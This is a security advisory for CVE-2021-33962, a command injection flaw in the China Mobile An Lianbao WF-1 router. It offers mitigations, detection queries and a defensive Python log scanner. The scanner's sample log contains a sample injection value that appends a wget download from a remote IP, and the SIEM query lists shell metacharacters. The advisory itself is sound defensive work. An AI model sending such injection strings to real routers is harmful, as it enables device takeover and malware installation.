CVE-2021-33962
📋 TL;DR
This CVE describes an OS command injection vulnerability in China Mobile An Lianbao WF-1 routers that allows attackers to execute arbitrary commands on the device. The vulnerability exists in the web interface's /api/ZRUsb/pop_usb_device component and affects users of this specific router model. Attackers can exploit this to gain full control of the router.
💻 Affected Systems
- China Mobile An Lianbao WF-1 router
📦 What is this software?
Firmware for the China Mobile An Lianbao WF-1 home router (the CPE entry lists the product as "an_lianbao_wf-1_firmware" by vendor "chinamobileltd"). Version v1.0.1 is the release named as affected.
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of the router allowing attackers to intercept all network traffic, install persistent malware, pivot to internal networks, and use the router as part of a botnet.
Likely Case
Router takeover leading to DNS hijacking, credential theft from network traffic, and deployment of malware to connected devices.
If Mitigated
Reduced impact if remote (WAN-side) management is disabled and the LAN is trusted: exploitation then requires an attacker who already has a foothold on the local network, and network segmentation limits what a compromised router can reach.
🎯 Exploit Status
Exploit details are publicly available in the GitHub write-up listed under References. The vulnerability requires no authentication and is simple to exploit, so any device whose management interface is reachable by an attacker should be treated as exposed.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: http://iot.10086.cn/?l=en-us
Restart Required: No
Instructions:
Check vendor website for firmware updates. If available, download latest firmware from http://iot.10086.cn and apply through router web interface.
🔧 Temporary Workarounds
Disable web interface remote access
Prevent external access to the router management interface.
Log in to the router admin panel -> Security/Firewall -> Disable remote management/remote access.
Block access to vulnerable endpoint
If you have shell access on the device, use the router's netfilter rules to drop requests that name the vulnerable endpoint:
# Drop TCP/80 packets whose payload contains the endpoint path (Boyer-Moore string match).
# Applies to LAN clients too, so legitimate use of the USB feature is blocked as well.
iptables -A INPUT -p tcp --dport 80 -m string --string "/api/ZRUsb/pop_usb_device" --algo bm -j DROP
Caveat: string matching is a stopgap. It is bypassed by percent-encoding or changing the case of the path, does not inspect HTTPS, and only drops the packet that carries the path. Disabling WAN management is the reliable workaround.
🧯 If You Can't Patch
- Replace the router with a different model that receives security updates
- Place router behind a dedicated firewall that blocks all management interface traffic
🔍 How to Verify
Check if Vulnerable:
Check the router firmware version in the web interface (Status or About page). If the version is v1.0.1, the device is vulnerable.
Check Version:
curl -s http://router-ip/ | grep -i firmware
Note: the unauthenticated landing page may not include the version string; if this prints nothing, read the version from the admin panel after logging in.
Verify Fix Applied:
Confirm the firmware version is newer than v1.0.1. The presence of the /api/ZRUsb/pop_usb_device endpoint is not by itself evidence of vulnerability, since a fixed firmware would keep the endpoint and sanitize its input; the version string is the indicator to rely on.
📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to /api/ZRUsb/pop_usb_device
- Commands with shell metacharacters in URL parameters
- Unexpected process execution from web server
Network Indicators:
- HTTP requests containing shell commands in parameters
- Traffic to /api/ZRUsb/pop_usb_device from external IPs
SIEM Query (field names uri and cmd are illustrative and depend on how your collector parses the router log; URL-decode parameters before matching, or percent-encoded payloads will not hit the wildcard terms):
source="router.log" AND (uri="/api/ZRUsb/pop_usb_device" OR cmd="*;*" OR cmd="*|*" OR cmd="*`*" OR cmd="*$(*")
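The indicators above expressed as a small log scanner, added here as an example and not taken from the vendor or the GitHub write-up. It assumes combined-format HTTP access log lines (router logging formats vary), treats the parameter name dev as a placeholder since the real parameter name is not stated on this page, and runs over constructed sample lines rather than captured traffic.

```python
"""Flag requests to the WF-1 USB endpoint that match the CVE-2021-33962 indicators.

Added example, not part of the original advisory or any vendor tooling.
Assumes Apache/nginx-style combined log lines; sample lines below are
constructed for illustration, not captured from a real device.
"""
import ipaddress
import re
from urllib.parse import parse_qsl, unquote, urlsplit

VULN_PATH = "/api/ZRUsb/pop_usb_device"

# Shell metacharacters that should never appear in a device-name or
# mount-point parameter handed to this endpoint.
SHELL_META = re.compile(r"[;|`&]|\$\(|\$\{|\n")

# Address ranges treated as "inside" the home network.
LAN_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "fc00::/7", "fe80::/10", "::1/128")]

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+" (?P<status>\d{3})'
)


def is_external(addr: str) -> bool:
    """True when the client address is outside the LAN ranges above."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return not any(ip in net for net in LAN_NETS)


def analyze_line(line: str) -> list:
    """Return the indicators a log line triggers (empty list if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    # Decode and lower-case the path so %2F or mixed case cannot hide the endpoint.
    if unquote(parts.path).lower() != VULN_PATH.lower():
        return []
    reasons = []
    if m.group("method") == "POST":
        reasons.append("POST to pop_usb_device (body not logged; inspect separately)")
    if is_external(m.group("src")):
        reasons.append(f"request from external address {m.group('src')}")
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded payloads.
        decoded = unquote(value)
        if SHELL_META.search(decoded):
            reasons.append(f"shell metacharacter in parameter {key!r}: {decoded!r}")
    return reasons


def scan(lines) -> list:
    """Return (line_number, reasons) for every line with at least one indicator."""
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = analyze_line(line)
        if reasons:
            hits.append((n, reasons))
    return hits


# Constructed sample log (not from a real device). 'dev' is an assumed parameter name.
SAMPLE_LOG = [
    '192.168.1.20 - - [10/Jun/2021:10:00:01 +0800] "GET / HTTP/1.1" 200 1532',
    '192.168.1.20 - - [10/Jun/2021:10:00:05 +0800] "GET /api/ZRUsb/pop_usb_device?dev=sda1 HTTP/1.1" 200 42',
    '192.168.1.77 - - [10/Jun/2021:10:00:09 +0800] "GET /api/ZRUsb/pop_usb_device?dev=sda1%3Bwget%20http%3A%2F%2F203.0.113.9%2Fx HTTP/1.1" 200 42',
    '198.51.100.23 - - [10/Jun/2021:10:00:12 +0800] "POST /api/ZRUsb/pop_usb_device HTTP/1.1" 200 42',
    '192.168.1.20 - - [10/Jun/2021:10:00:15 +0800] "GET /api/ZRUsb/list HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: " + "; ".join(reasons))
```

Only lines 3 and 4 of the sample are flagged: the benign LAN request with a plain device name passes, while the percent-encoded `;wget` payload and the POST from a non-LAN address are reported. Decoding the path before comparison matters, because the iptables string match and the raw SIEM wildcards above both miss encoded variants.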
🔗 References
- http://iot.10086.cn/?l=en-us
- https://github.com/pokerfacett/MY_CVE_CREDIT/blob/master/China%20Mobile%20An%20Lianbao%20WF-1%20router%20Command%20Injection12.md
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-03520
- https://www.ebuy7.com/item/china-mobile-wireless-router-qualcomm-qiki-wifi6-routing-mesh-network-home-5g-dual-frequency-double-gigabit-port-wall-wall-high-speed-%E2%80%8B%E2%80%8Bhigh-power-enhanced-dormitory-students-an-lianbao-wf-1-628692180620